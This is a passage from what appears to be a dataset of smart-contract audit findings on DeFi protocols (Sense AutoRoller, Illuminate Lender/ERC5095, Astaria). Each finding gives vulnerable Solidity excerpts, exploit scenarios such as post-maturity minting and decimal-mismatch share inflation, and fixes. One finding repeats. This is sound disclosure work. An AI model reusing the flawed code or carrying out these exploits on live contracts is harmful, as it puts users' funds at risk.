forgotten.\\n```\\n (, uint48 prevIssuance, , , , , uint256 iscale, uint256 mscale, ) = DividerLike(DIVIDER).series(adapter, prevMaturity);\\n```\\n\\nWith an incorrect address the divider#series call will revert causing RollerUtils#getNewTargetedRate to revert, which is called in AutoRoller#cooldown. The result is that the AutoRoller cycle can never be completed. LP will be forced to either withdraw or eject to remove their liquidity. Withdraw only works to a certain point because the AutoRoller tries to keep the target ratio. After which the eject would be the only way for LPs to withdraw. During eject the AutoRoller attempts to combine the PT and YT. If the adapter is also combineRestricted then there is no longer any way for the LPs to withdraw, causing loss of their funds.чRollerUtils DIVIDER should be set by constructor. Additionally RollerUtils should be deployed by the factory constructor to make sure they always have the same immutable divider reference.чIncorrect hard-coded divider address will brick autorollers for all adapters and will cause loss of funds for combineRestricted adaptersч```\\naddress internal constant DIVIDER = 0x09B10E45A912BcD4E80a8A3119f0cfCcad1e1f12;\\n```\\n -AutoRoller.sol#roll can revert if lastSettle is zero because solmate ERC4626 deposit revert if previewDeposit returns 0чmediumчAutoRoller.sol#roll can revert if lastSettle is zero because solmate ERC4626 deposit revert if previewDeposit returns 0\\nlet us look into the implementation of function roll()\\n```\\n /// @notice Roll into the next Series if there isn't an active series and the cooldown period has elapsed.\\n function roll() external {\\n if (maturity != MATURITY_NOT_SET) revert RollWindowNotOpen();\\n\\n if (lastSettle == 0) {\\n // If this is the first roll, lock some shares in by minting them for the zero address.\\n // This prevents the contract from reaching an empty state during future active periods.\\n deposit(firstDeposit, address(0));\\n } else if (lastSettle + cooldown > block.timestamp) {\\n revert RollWindowNotOpen();\\n }\\n\\n lastRoller = msg.sender;\\n adapter.openSponsorWindow();\\n }\\n```\\n\\nnote, if lastSettle is 0, we deposit a small amount of token and mint shares to address(0)\\n```\\ndeposit(firstDeposit, address(0));\\n```\\n\\nFirst deposit is a fairly small amount:\\n```\\nfirstDeposit = (0.01e18 - 1) / scalingFactor + 1;\\n```\\n\\nWe can deposit from ERC4626 implementation:\\n```\\nfunction deposit(uint256 assets, address receiver) public virtual returns (uint256 shares) {\\n // Check for rounding error since we round down in previewDeposit.\\n require((shares = previewDeposit(assets)) != 0, \"ZERO_SHARES\");\\n\\n // Need to transfer before minting or ERC777s could reenter.\\n asset.safeTransferFrom(msg.sender, address(this), assets);\\n\\n _mint(receiver, shares);\\n\\n emit Deposit(msg.sender, receiver, assets, shares);\\n\\n afterDeposit(assets, shares);\\n}\\n```\\n\\nnote the restriction:\\n```\\n// Check for rounding error since we round down in previewDeposit.\\nrequire((shares = previewDeposit(assets)) != 0, \"ZERO_SHARES\");\\n\\n// Need to transfer before minting or ERC777s could reenter.\\nasset.safeTransferFrom(msg.sender, address(this), assets);\\n```\\n\\nif previewDeposit returns 0 shares, transaction revert. Can previewDeposit returns 0 shares? it is very possible.\\n```\\nfunction previewDeposit(uint256 assets) public view override returns (uint256) {\\n if (maturity == MATURITY_NOT_SET) {\\n return super.previewDeposit(assets);\\n } else {\\n Space _space = space;\\n (uint256 ptReserves, uint256 targetReserves) = _getSpaceReserves();\\n\\n // Calculate how much Target we'll end up joining the pool with, and use that to preview minted LP shares.\\n uint256 previewedLPBal = (assets - _getTargetForIssuance(ptReserves, targetReserves, assets, adapter.scaleStored()))\\n .mulDivDown(_space.adjustedTotalSupply(), targetReserves);\\n\\n // Shares represent proportional ownership of LP shares the vault holds.\\n return previewedLPBal.mulDivDown(totalSupply, _space.balanceOf(address(this)));\\n }\\n}\\n```\\n\\nIf (previewedLPBal * total) / space balance is truncated to 0, transaction revert. _space.balanceOf can certainly be inflated if malicious actor send the space token to the address manually. Or previewedLPBal * total could just be small and the division is truncated to 0.чWe recommend the project not deposit a such small amount, or there could be a function that let admin gradually control how many tokens should we put in the first deposit.чcalling roll would revert and the new sponsored series cannot be started properly.ч```\\n /// @notice Roll into the next Series if there isn't an active series and the cooldown period has elapsed.\\n function roll() external {\\n if (maturity != MATURITY_NOT_SET) revert RollWindowNotOpen();\\n\\n if (lastSettle == 0) {\\n // If this is the first roll, lock some shares in by minting them for the zero address.\\n // This prevents the contract from reaching an empty state during future active periods.\\n deposit(firstDeposit, address(0));\\n } else if (lastSettle + cooldown > block.timestamp) {\\n revert RollWindowNotOpen();\\n }\\n\\n lastRoller = msg.sender;\\n adapter.openSponsorWindow();\\n }\\n```\\n -AutoRoller.sol#roll can revert if lastSettle is zero because solmate ERC4626 deposit revert if previewDeposit returns 0чmediumчAutoRoller.sol#roll can revert if lastSettle is zero because solmate ERC4626 deposit revert if previewDeposit returns 0\\nlet us look into the implementation of function roll()\\n```\\n /// @notice Roll into the next Series if there isn't an active series and the cooldown period has elapsed.\\n function roll() external {\\n if (maturity != MATURITY_NOT_SET) revert RollWindowNotOpen();\\n\\n if (lastSettle == 0) {\\n // If this is the first roll, lock some shares in by minting them for the zero address.\\n // This prevents the contract from reaching an empty state during future active periods.\\n deposit(firstDeposit, address(0));\\n } else if (lastSettle + cooldown > block.timestamp) {\\n revert RollWindowNotOpen();\\n }\\n\\n lastRoller = msg.sender;\\n adapter.openSponsorWindow();\\n }\\n```\\n\\nnote, if lastSettle is 0, we deposit a small amount of token and mint shares to address(0)\\n```\\ndeposit(firstDeposit, address(0));\\n```\\n\\nFirst deposit is a fairly small amount:\\n```\\nfirstDeposit = (0.01e18 - 1) / scalingFactor + 1;\\n```\\n\\nWe can deposit from ERC4626 implementation:\\n```\\nfunction deposit(uint256 assets, address receiver) public virtual returns (uint256 shares) {\\n // Check for rounding error since we round down in previewDeposit.\\n require((shares = previewDeposit(assets)) != 0, \"ZERO_SHARES\");\\n\\n // Need to transfer before minting or ERC777s could reenter.\\n asset.safeTransferFrom(msg.sender, address(this), assets);\\n\\n _mint(receiver, shares);\\n\\n emit Deposit(msg.sender, receiver, assets, shares);\\n\\n afterDeposit(assets, shares);\\n}\\n```\\n\\nnote the restriction:\\n```\\n// Check for rounding error since we round down in previewDeposit.\\nrequire((shares = previewDeposit(assets)) != 0, \"ZERO_SHARES\");\\n\\n// Need to transfer before minting or ERC777s could reenter.\\nasset.safeTransferFrom(msg.sender, address(this), assets);\\n```\\n\\nif previewDeposit returns 0 shares, transaction revert. Can previewDeposit returns 0 shares? it is very possible.\\n```\\nfunction previewDeposit(uint256 assets) public view override returns (uint256) {\\n if (maturity == MATURITY_NOT_SET) {\\n return super.previewDeposit(assets);\\n } else {\\n Space _space = space;\\n (uint256 ptReserves, uint256 targetReserves) = _getSpaceReserves();\\n\\n // Calculate how much Target we'll end up joining the pool with, and use that to preview minted LP shares.\\n uint256 previewedLPBal = (assets - _getTargetForIssuance(ptReserves, targetReserves, assets, adapter.scaleStored()))\\n .mulDivDown(_space.adjustedTotalSupply(), targetReserves);\\n\\n // Shares represent proportional ownership of LP shares the vault holds.\\n return previewedLPBal.mulDivDown(totalSupply, _space.balanceOf(address(this)));\\n }\\n}\\n```\\n\\nIf (previewedLPBal * total) / space balance is truncated to 0, transaction revert. _space.balanceOf can certainly be inflated if malicious actor send the space token to the address manually. Or previewedLPBal * total could just be small and the division is truncated to 0.чWe recommend the project not deposit a such small amount, or there could be a function that let admin gradually control how many tokens should we put in the first deposit.чcalling roll would revert and the new sponsored series cannot be started properly.ч```\\n /// @notice Roll into the next Series if there isn't an active series and the cooldown period has elapsed.\\n function roll() external {\\n if (maturity != MATURITY_NOT_SET) revert RollWindowNotOpen();\\n\\n if (lastSettle == 0) {\\n // If this is the first roll, lock some shares in by minting them for the zero address.\\n // This prevents the contract from reaching an empty state during future active periods.\\n deposit(firstDeposit, address(0));\\n } else if (lastSettle + cooldown > block.timestamp) {\\n revert RollWindowNotOpen();\\n }\\n\\n lastRoller = msg.sender;\\n adapter.openSponsorWindow();\\n }\\n```\\n -Math rounding in AutoRoller.sol is not ERC4626-complicant: previewWithdraw should round up.чmediumчMath rounding in AutoRoller.sol is not ERC4626-complicant: previewWithdraw should round up.\\nFinally, ERC-4626 Vault implementers should be aware of the need for specific, opposing rounding directions across the different mutable and view methods, as it is considered most secure to favor the Vault itself during calculations over its users:\\nIf (1) it's calculating how many shares to issue to a user for a certain amount of the underlying tokens they provide or (2) it's determining the amount of the underlying tokens to transfer to them for returning a certain amount of shares, it should round down. If (1) it's calculating the amount of shares a user has to supply to receive a given amount of the underlying tokens or (2) it's calculating the amount of underlying tokens a user has to provide to receive a certain amount of shares, it should round up.\\nThen previewWithdraw in AutoRoller.sol should round up.\\nThe original implementation for previewWithdraw in Solmate ERC4626 is:\\n```\\n function previewWithdraw(uint256 assets) public view virtual returns (uint256) {\\n uint256 supply = totalSupply; // Saves an extra SLOAD if totalSupply is non-zero.\\n\\n return supply == 0 ? assets : assets.mulDivUp(supply, totalAssets());\\n }\\n```\\n\\nIt is rounding up, however in the implementation of the AutoRoller.sol#previewWith is not round up.\\n```\\nfor (uint256 i = 0; i < 20;) { // 20 chosen as a safe bound for convergence from practical trials.\\n if (guess > supply) {\\n guess = supply;\\n }\\n\\n int256 answer = previewRedeem(guess.safeCastToUint()).safeCastToInt() - assets.safeCastToInt();\\n\\n if (answer >= 0 && answer <= assets.mulWadDown(0.001e18).safeCastToInt() || (prevAnswer == answer)) { // Err on the side of overestimating shares needed. Could reduce precision for gas efficiency.\\n break;\\n }\\n\\n if (guess == supply && answer < 0) revert InsufficientLiquidity();\\n\\n int256 nextGuess = guess - (answer * (guess - prevGuess) / (answer - prevAnswer));\\n prevGuess = guess;\\n prevAnswer = answer;\\n guess = nextGuess;\\n\\n unchecked { ++i; }\\n}\\n\\nreturn guess.safeCastToUint() + maxError; // Buffer for pow discrepancies.\\n```\\n\\nnote the line:\\n```\\n int256 answer = previewRedeem(guess.safeCastToUint()).safeCastToInt() - assets.safeCastToInt();\\n```\\n\\npreviewRedeem is round down.\\nand later we update guess and return guess\\n```\\n int256 nextGuess = guess - (answer * (guess - prevGuess) / (answer - prevAnswer));\\n prevGuess = guess;\\n prevAnswer = answer;\\n guess = nextGuess;\\n```\\n\\nand\\n```\\n return guess.safeCastToUint() + maxError; // Buffer for pow discrepancies.\\n```\\n\\nwhen calculating the the nextGuess, the code does not round up.\\n```\\nint256 nextGuess = guess - (answer * (guess - prevGuess) / (answer - prevAnswer));\\n```\\nчRound up in previewWithdraw using mulDivUp and divWadUpчOther protocols that integrate with Sense finance AutoRoller.sol might wrongly assume that the functions handle rounding as per ERC4626 expectation. Thus, it might cause some intergration problem in the future that can lead to wide range of issues for both parties.ч```\\n function previewWithdraw(uint256 assets) public view virtual returns (uint256) {\\n uint256 supply = totalSupply; // Saves an extra SLOAD if totalSupply is non-zero.\\n\\n return supply == 0 ? assets : assets.mulDivUp(supply, totalAssets());\\n }\\n```\\n -Lender#lend for Sense has mismatched decimalsчhighчThe decimals of the Sense principal token don't match the decimals of the ERC5095 vault it mints shares to. This can be abused on the USDC market to mint a large number of shares to steal yield from all other users.\\n```\\n uint256 received;\\n {\\n // Get the starting balance of the principal token\\n uint256 starting = token.balanceOf(address(this));\\n\\n // Swap those tokens for the principal tokens\\n ISensePeriphery(x).swapUnderlyingForPTs(adapter, s, lent, r);\\n\\n // Calculate number of principal tokens received in the swap\\n received = token.balanceOf(address(this)) - starting;\\n\\n // Verify that we received the principal tokens\\n if (received < r) {\\n revert Exception(11, 0, 0, address(0), address(0));\\n }\\n }\\n\\n // Mint the Illuminate tokens based on the returned amount\\n IERC5095(principalToken(u, m)).authMint(msg.sender, received);\\n```\\n\\nSense principal tokens for DIA and USDC are 8 decimals to match the decimals of the underlying cTokens, cUSDC and cDAI. The decimals of the ERC5095 vault matches the underlying of the vault. This creates a disparity in decimals that aren't adjusted for in Lender#lend for Sense, which assumes that the vault and Sense principal tokens match in decimals. In the example of USDC the ERC5095 will be 6 decimals but the sense token will be 8 decimals. Each 1e6 USDC token will result in ~1e8 Sense tokens being received. Since the contract mints based on the difference in the number of sense tokens before and after the call, it will mint ~100x the number of vault shares than it should. Since the final yield is distributed pro-rata to the number of shares, the user who minted with sense will be entitled to much more yield than they should be and everyone else will get substantially less.чIssue Lender#lend for Sense has mismatched decimals\\nQuery the decimals of the Sense principal and use that to adjust the decimals to match the decimals of the vault.чUser can mint large number of shares to steal funds from other usersч```\\n uint256 received;\\n {\\n // Get the starting balance of the principal token\\n uint256 starting = token.balanceOf(address(this));\\n\\n // Swap those tokens for the principal tokens\\n ISensePeriphery(x).swapUnderlyingForPTs(adapter, s, lent, r);\\n\\n // Calculate number of principal tokens received in the swap\\n received = token.balanceOf(address(this)) - starting;\\n\\n // Verify that we received the principal tokens\\n if (received < r) {\\n revert Exception(11, 0, 0, address(0), address(0));\\n }\\n }\\n\\n // Mint the Illuminate tokens based on the returned amount\\n IERC5095(principalToken(u, m)).authMint(msg.sender, received);\\n```\\n -Lend or mint after maturityчhighчThe protocol does not forbid lending or minting after the maturity leaving the possibility to profit from early users.\\nLet's take the mint function as an example:\\n```\\n function mint(\\n uint8 p,\\n address u,\\n uint256 m,\\n uint256 a\\n ) external unpaused(u, m, p) returns (bool) {\\n // Fetch the desired principal token\\n address principal = IMarketPlace(marketPlace).token(u, m, p);\\n\\n // Transfer the users principal tokens to the lender contract\\n Safe.transferFrom(IERC20(principal), msg.sender, address(this), a);\\n\\n // Mint the tokens received from the user\\n IERC5095(principalToken(u, m)).authMint(msg.sender, a);\\n\\n emit Mint(p, u, m, a);\\n\\n return true;\\n }\\n```\\n\\nIt is a simple function that accepts the principal token and mints the corresponding ERC5095 tokens in return. There are no restrictions on timing, the user can mint even after the maturity. Malicious actors can take this as an advantage to pump their bags on behalf of legitimate early users.\\nScenario:\\nLegitimate users lend and mint their ERC5095 tokens before maturity.\\nWhen the maturity kicks in, lender tokens are redeemed and holdings are updated.\\nLegitimate users try to redeem their ERC5095 for the underlying tokens. The formula is `(amount * holdings[u][m]) / token.totalSupply();`\\nA malicious actor sandwiches legitimate users, and mints the ERC5095 thus increasing the totalSupply and reducing other user shares. Then redeem principals again and burn their own shares for increased rewards.\\nExample with concrete values:\\nuserA deposits `100` tokens, user B deposits `200` tokens. The total supply minted is `300` ERC5095 tokens.\\nAfter the maturity the redemption happens and now let's say `holdings[u][m]` is `330` (+30).\\nuserA tries to redeem the underlying. The expected amount is: `100` * `330` / `300` = 110. However, this action is frontrunned by userC (malicious) who mints yet another `500` tokens post-maturity. The total supply becomes `800`. The real value userA now receives is: 110 * `330` / `800` = 45.375.\\nAfter that the malicious actor userC invokes the redemption again, and the `holdings[u][m]` is now `330` - 45.375 + `550` = 834.625.\\nuserC redeems the underlying: `500` * 834.625 / 700 ~= 596.16 (expected was 550).\\nNow all the remaining users will also slightly benefit, e.g. in this case userB redeems what's left: `200` * 238.46 / `200` = 238.46 (expected was 220).чIssue Lend or mint after maturity\\nLend/mint should be forbidden post-maturity.чThe amount legitimate users receive will be devaluated, while malicious actor can increase their ROI without meaningfully contributing to the protocol and locking their tokens.ч```\\n function mint(\\n uint8 p,\\n address u,\\n uint256 m,\\n uint256 a\\n ) external unpaused(u, m, p) returns (bool) {\\n // Fetch the desired principal token\\n address principal = IMarketPlace(marketPlace).token(u, m, p);\\n\\n // Transfer the users principal tokens to the lender contract\\n Safe.transferFrom(IERC20(principal), msg.sender, address(this), a);\\n\\n // Mint the tokens received from the user\\n IERC5095(principalToken(u, m)).authMint(msg.sender, a);\\n\\n emit Mint(p, u, m, a);\\n\\n return true;\\n }\\n```\\n -Incorrect parametersчmediumчSome functions and integrations receive the wrong parameters.\\nHere, this does not work:\\n```\\n } else if (p == uint8(Principals.Notional)) {\\n // Principal token must be approved for Notional's lend\\n ILender(lender).approve(address(0), address(0), address(0), a);\\n```\\n\\nbecause it basically translates to:\\n```\\n } else if (p == uint8(Principals.Notional)) {\\n if (a != address(0)) {\\n Safe.approve(IERC20(address(0)), a, type(uint256).max);\\n }\\n```\\n\\nIt tries to approve a non-existing token. It should approve the underlying token and Notional's token contract.\\nAnother issue is with Tempus here:\\n```\\n // Swap on the Tempus Router using the provided market and params\\n ITempus(controller).depositAndFix(x, lent, true, r, d);\\n\\n // Calculate the amount of Tempus principal tokens received after the deposit\\n uint256 received = IERC20(principal).balanceOf(address(this)) - start;\\n\\n // Verify that a minimum number of principal tokens were received\\n if (received < r) {\\n revert Exception(11, received, r, address(0), address(0));\\n }\\n```\\n\\nIt passes `r` as a slippage parameter and later checks that received >= `r`. However, in Tempus this parameter is not exactly the minimum amount to receive, it is the ratio which is calculated as follows:\\n```\\n /// @param minTYSRate Minimum exchange rate of TYS (denominated in TPS) to receive in exchange for TPS\\n function depositAndFix(\\n ITempusAMM tempusAMM,\\n uint256 tokenAmount,\\n bool isBackingToken,\\n uint256 minTYSRate,\\n uint256 deadline\\n ) external payable nonReentrant {\\n// rest of code\\n uint256 minReturn = swapAmount.mulfV(minTYSRate, targetPool.backingTokenONE());\\n```\\nчReview all the integrations and function invocations, and make sure the appropriate parameters are passed.чInaccurate parameter values may lead to protocol misfunction down the road, e.g. insufficient approval or unpredicted slippage.ч```\\n } else if (p == uint8(Principals.Notional)) {\\n // Principal token must be approved for Notional's lend\\n ILender(lender).approve(address(0), address(0), address(0), a);\\n```\\n -Sense PT redemptions do not allow for known loss scenariosчmediumчSense PT redemptions do not allow for known loss scenarios, which will lead to principal losses\\nThe Sense PT redemption code in the `Redeemer` expects any losses during redemption to be due to a malicious adapter, and requires that there be no losses. However, there are legitimate reasons for there to be losses which aren't accounted for, which will cause the PTs to be unredeemable. The Lido FAQ page lists two such reasons:\\n```\\n- Slashing risk\\n\\nETH 2.0 validators risk staking penalties, with up to 100% of staked funds at risk if validators fail. To minimise this risk, Lido stakes across multiple professional and reputable node operators with heterogeneous setups, with additional mitigation in the form of insurance that is paid from Lido fees.\\n\\n- stETH price risk\\n\\nUsers risk an exchange price of stETH which is lower than inherent value due to withdrawal restrictions on Lido, making arbitrage and risk-free market-making impossible. \\n\\nThe Lido DAO is driven to mitigate above risks and eliminate them entirely to the extent possible. Despite this, they may still exist and, as such, it is our duty to communicate them.\\n```\\n\\nIf Lido is slashed, or there are withdrawal restrictions, the Sense series sponsor will be forced to settle the series, regardless of the exchange rate (or miss out on their rewards). The Sense `Divider` contract anticipates and properly handles these losses, but the Illuminate code does not.\\nLido is just one example of a Sense token that exists in the Illuminate code base - there may be others added in the future which also require there to be allowances for losses.чAllow losses during redemption if Sense's `Periphery.verified()` returns `true`чPermanent freezing of funds\\nThere may be a malicious series sponsor that purposely triggers a loss, either by DOSing Lido validators, or by withdrawing enough to trigger withdrawal restrictions. In such a case, the exchange rate stored by Sense during the settlement will lead to losses, and users that hold Illumimate PTs (not just the users that minted Illuminate PTs with Sense PTs), will lose their principal, because Illuminate PT redemptions are an a share-of-underlying basis, not on the basis of the originally-provided token.\\nWhile the Illuminate project does have an emergency `withdraw()` function that would allow an admin to rescue the funds and manually distribute them, this would not be trustless and defeats the purpose of having a smart contract.ч```\\n- Slashing risk\\n\\nETH 2.0 validators risk staking penalties, with up to 100% of staked funds at risk if validators fail. To minimise this risk, Lido stakes across multiple professional and reputable node operators with heterogeneous setups, with additional mitigation in the form of insurance that is paid from Lido fees.\\n\\n- stETH price risk\\n\\nUsers risk an exchange price of stETH which is lower than inherent value due to withdrawal restrictions on Lido, making arbitrage and risk-free market-making impossible. \\n\\nThe Lido DAO is driven to mitigate above risks and eliminate them entirely to the extent possible. Despite this, they may still exist and, as such, it is our duty to communicate them.\\n```\\n -Notional PT redemptions do not use flash-resistant pricesчmediumчNotional PT redemptions do not use the correct function for determining balances, which will lead to principal losses\\nEIP-4626 states the following about maxRedeem():\\n```\\nMUST return the maximum amount of shares that could be transferred from `owner` through `redeem` and not cause a revert, which MUST NOT be higher than the actual maximum that would be accepted (it should underestimate if necessary).\\n\\nMUST factor in both global and user-specific limits, like if redemption is entirely disabled (even temporarily) it MUST return 0.\\n```\\n\\nThe above means that the implementer is free to return less than the actual balance, and is in fact required to return zero if the token's backing store is paused, and Notional's can be paused. While neither of these conditions currently apply to the existing wfCashERC4626 implementation, there is nothing stopping Notional from implementing the MUST-return-zero-if-paused fix tomorrow, or from changing their implementation to one that requires `maxRedeem()` to return something other than the current balance.чUse `balanceOf()` rather than `maxRedeem()` in the call to `INotional.redeem()`, and make sure that Illuminate PTs can't be burned if `Lender` still has Notional PTs that it needs to redeem (based on its own accounting of what is remaining, not based on balance checks, so that it can't be griefed with dust).чPermanent freezing of funds\\nIf `maxRedeem()` were to return zero, or some other non-exact value, fewer Notional PTs would be redeemed than are available, and users that redeem()ed their shares, would receive fewer underlying (principal if they minted Illuminate PTs with Notional PTs, e.g. to be an LP in the pool) than they are owed. The Notional PTs that weren't redeemed would still be available for a subsequent call, but if a user already redeemed their Illuminate PTs, their loss will already be locked in, since their Illuminate PTs will have been burned. This would affect ALL Illuminate PT holders of a specific market, not just the ones that provided the Notional PTs, because Illuminate PT redemptions are an a share-of-underlying basis, not on the basis of the originally-provided token. Markets that are already live with Notional set cannot be protected via a redemption pause by the Illuminate admin, because redemption of Lender's external PTs for underlying does not use the `unpaused` modifier, and does have any access control.ч```\\nMUST return the maximum amount of shares that could be transferred from `owner` through `redeem` and not cause a revert, which MUST NOT be higher than the actual maximum that would be accepted (it should underestimate if necessary).\\n\\nMUST factor in both global and user-specific limits, like if redemption is entirely disabled (even temporarily) it MUST return 0.\\n```\\n -Marketplace.setPrincipal do not approve needed allowance for Element vault and APWine routerчmediumч`Marketplace.setPrincipal` do not approve needed allowance for `Element vault` and `APWine router`\\n`Marketplace.setPrincipal` is used to provide principal token for the base token and maturity when it was not set yet. To set PT you also provide protocol that this token belongs to.\\nIn case of `APWine` protocol there is special block of code to handle all needed allowance. But it is not enough.\\n```\\n } else if (p == uint8(Principals.Apwine)) {\\n address futureVault = IAPWineToken(a).futureVault();\\n address interestBearingToken = IAPWineFutureVault(futureVault)\\n .getIBTAddress();\\n IRedeemer(redeemer).approve(interestBearingToken);\\n } else if (p == uint8(Principals.Notional)) {\\n```\\n\\nBut in `setPrincipal` we don't have such params and allowance is not set. So `Lender` will not be able to work with that tokens correctly.чAdd 2 more params as in `createMarket` and call `ILender(lender).approve(u, e, a, address(0));`чLender will not provide needed allowance and protocol integration will fail.ч```\\n } else if (p == uint8(Principals.Apwine)) {\\n address futureVault = IAPWineToken(a).futureVault();\\n address interestBearingToken = IAPWineFutureVault(futureVault)\\n .getIBTAddress();\\n IRedeemer(redeemer).approve(interestBearingToken);\\n } else if (p == uint8(Principals.Notional)) {\\n```\\n -ERC5095.mint function calculates slippage incorrectlyчmediumчERC5095.mint function calculates slippage incorrectly. This leads to lost of funds for user.\\n`ERC5095.mint` function should take amount of shares that user wants to receive and then buy this amount. It uses hardcoded 1% slippage when trades base tokens for principal. But it takes 1% of calculated assets amount, not shares.\\n```\\n function mint(address r, uint256 s) external override returns (uint256) {\\n if (block.timestamp > maturity) {\\n revert Exception(\\n 21,\\n block.timestamp,\\n maturity,\\n address(0),\\n address(0)\\n );\\n }\\n uint128 assets = Cast.u128(previewMint(s));\\n Safe.transferFrom(\\n IERC20(underlying),\\n msg.sender,\\n address(this),\\n assets\\n );\\n // consider the hardcoded slippage limit, 4626 compliance requires no minimum param.\\n uint128 returned = IMarketPlace(marketplace).sellUnderlying(\\n underlying,\\n maturity,\\n assets,\\n assets - (assets / 100)\\n );\\n _transfer(address(this), r, returned);\\n return returned;\\n }\\n```\\n\\nThis is how slippage is provided\\n```\\nuint128 returned = IMarketPlace(marketplace).sellUnderlying(\\n underlying,\\n maturity,\\n assets,\\n assets - (assets / 100)\\n );\\n```\\n\\nBut the problem is that assets it is amount of base tokens that user should pay for the shares he want to receive. Slippage should be calculated using shares amount user expect to get.\\nExample. User calls mint and provides amount 1000. That means that he wants to get 1000 principal tokens. While converting to assets, assets = 990. That means that user should pay 990 base tokens to get 1000 principal tokens. Then the `sellUnderlying` is send and slippage provided is `990*0.99=980.1`. So when something happens with price it's possible that user will receive 980.1 principal tokens instead of 1000 which is 2% lost.\\nTo fix this you should provide `s - (s / 100)` as slippage.чUse this.\\n```\\nuint128 returned = IMarketPlace(marketplace).sellUnderlying(\\n underlying,\\n maturity,\\n assets,\\n s- (s / 100)\\n );\\n```\\nчLost of users funds.ч```\\n function mint(address r, uint256 s) external override returns (uint256) {\\n if (block.timestamp > maturity) {\\n revert Exception(\\n 21,\\n block.timestamp,\\n maturity,\\n address(0),\\n address(0)\\n );\\n }\\n uint128 assets = Cast.u128(previewMint(s));\\n Safe.transferFrom(\\n IERC20(underlying),\\n msg.sender,\\n address(this),\\n assets\\n );\\n // consider the hardcoded slippage limit, 4626 compliance requires no minimum param.\\n uint128 returned = IMarketPlace(marketplace).sellUnderlying(\\n underlying,\\n maturity,\\n assets,\\n assets - (assets / 100)\\n );\\n _transfer(address(this), r, returned);\\n return returned;\\n }\\n```\\n -ERC5095.deposit doesn't check if received shares is less then provided amountчmediumч`ERC5095.deposit` doesn't check if received shares is less then provided amount. In some cases this leads to lost of funds.\\nThe main thing with principal tokens is to buy them when the price is lower (you can buy 101 token while paying only 100 base tokens) as underlying price and then at maturity time to get interest(for example in one month you will get 1 base token in our case).\\n`ERC5095.deposit` function takes amount of base token that user wants to deposit and returns amount of shares that he received. To not have loses, the amount of shares should be at least bigger than amount of base tokens provided by user.\\n```\\n function deposit(address r, uint256 a) external override returns (uint256) {\\n if (block.timestamp > maturity) {\\n revert Exception(\\n 21,\\n block.timestamp,\\n maturity,\\n address(0),\\n address(0)\\n );\\n }\\n uint128 shares = Cast.u128(previewDeposit(a));\\n Safe.transferFrom(IERC20(underlying), msg.sender, address(this), a);\\n // consider the hardcoded slippage limit, 4626 compliance requires no minimum param.\\n uint128 returned = IMarketPlace(marketplace).sellUnderlying(\\n underlying,\\n maturity,\\n Cast.u128(a),\\n shares - (shares / 100)\\n );\\n _transfer(address(this), r, returned);\\n return returned;\\n }\\n```\\n\\nWhile calling market place, you can see that slippage of 1 percent is provided.\\n```\\nuint128 returned = IMarketPlace(marketplace).sellUnderlying(\\n underlying,\\n maturity,\\n Cast.u128(a),\\n shares - (shares / 100)\\n );\\n```\\n\\nBut this is not enough in some cases.\\nFor example we have `ERC5095` token with short maturity which provides `0.5%` of interests. userA calls `deposit` function with 1000 as base amount. He wants to get back 1005 share tokens. And after maturity time earn 5 tokens on this trade.\\nBut because of slippage set to `1%`, it's possible that the price will change and user will receive 995 share tokens instead of 1005, which means that user has lost 5 base tokens.\\nI propose to add one more mechanism except of slippage. We need to check if returned shares amount is bigger then provided assets amount.чAdd this check at the end `require(returned > a, \"received less than provided\")`чLost of funds.ч```\\n function deposit(address r, uint256 a) external override returns (uint256) {\\n if (block.timestamp > maturity) {\\n revert Exception(\\n 21,\\n block.timestamp,\\n maturity,\\n address(0),\\n address(0)\\n );\\n }\\n uint128 shares = Cast.u128(previewDeposit(a));\\n Safe.transferFrom(IERC20(underlying), msg.sender, address(this), a);\\n // consider the hardcoded slippage limit, 4626 compliance requires no minimum param.\\n uint128 returned = IMarketPlace(marketplace).sellUnderlying(\\n underlying,\\n maturity,\\n Cast.u128(a),\\n shares - (shares / 100)\\n );\\n _transfer(address(this), r, returned);\\n return returned;\\n }\\n```\\n -Curve LP Controller withdraw and claim function uses wrong signatureчmediumчThe function signature used for `WITHDRAWCLAIM` in both CurveLPStakingController.sol and BalancerLPStakingController.sol are incorrect, leading to the function not succeeding.\\nIn both the CurveLPStakingController.sol and BalancerLPStakingController.sol contracts, the function selector `0x00ebf5dd` is used for `WITHDRAWCLAIM`. This selector corresponds to a function signature of `withdraw(uint256,address,bool)`.\\n```\\nbytes4 constant WITHDRAWCLAIM = 0x00ebf5dd;\\n```\\n\\nHowever, the `withdraw()` function in the Curve contract does not have an address argument. Instead, the function signature reads `withdraw(uint256,bool)`, which corresponds to a function selector of `0x38d07436`.чChange the function selector in both contracts to `0x38d07436`.чUsers who have deposited assets into Curve pools will not be able to claim their rewards when they withdraw their tokens.ч```\\nbytes4 constant WITHDRAWCLAIM = 0x00ebf5dd;\\n```\\n -Strategist nonce is not checkedчmediumчStrategist nonce is not checked while checking commitment. This makes impossible for strategist to cancel signed commitment.\\n`VaultImplementation.commitToLien` is created to give the ability to borrow from the vault. The conditions of loan are discussed off chain and owner or delegate of the vault then creates and signes deal details. Later borrower can provide it as `IAstariaRouter.Commitment calldata params` param to `VaultImplementation.commitToLien`.\\nAfter the checking of signer of commitment `VaultImplementation._validateCommitment` function calls `AstariaRouter.validateCommitment`.\\n```\\n function validateCommitment(IAstariaRouter.Commitment calldata commitment)\\n public\\n returns (bool valid, IAstariaRouter.LienDetails memory ld)\\n {\\n require(\\n commitment.lienRequest.strategy.deadline >= block.timestamp,\\n \"deadline passed\"\\n );\\n\\n\\n require(\\n strategyValidators[commitment.lienRequest.nlrType] != address(0),\\n \"invalid strategy type\"\\n );\\n\\n\\n bytes32 leaf;\\n (leaf, ld) = IStrategyValidator(\\n strategyValidators[commitment.lienRequest.nlrType]\\n ).validateAndParse(\\n commitment.lienRequest,\\n COLLATERAL_TOKEN.ownerOf(\\n commitment.tokenContract.computeId(commitment.tokenId)\\n ),\\n commitment.tokenContract,\\n commitment.tokenId\\n );\\n\\n\\n return (\\n MerkleProof.verifyCalldata(\\n commitment.lienRequest.merkle.proof,\\n commitment.lienRequest.merkle.root,\\n leaf\\n ),\\n ld\\n );\\n }\\n```\\n\\nThis function check additional params, one of which is `commitment.lienRequest.strategy.deadline`. But it doesn't check for the nonce of strategist here. But this nonce is used while signing.\\nAlso `AstariaRouter` gives ability to increment nonce for strategist, but it is never called. That means that currently strategist use always same nonce and can't cancel his commitment.чGive ability to strategist to call `increaseNonce` function.чStrategist can't cancel his commitment. User can use this commitment to borrow up to 5 times.ч```\\n function validateCommitment(IAstariaRouter.Commitment calldata commitment)\\n public\\n returns (bool valid, 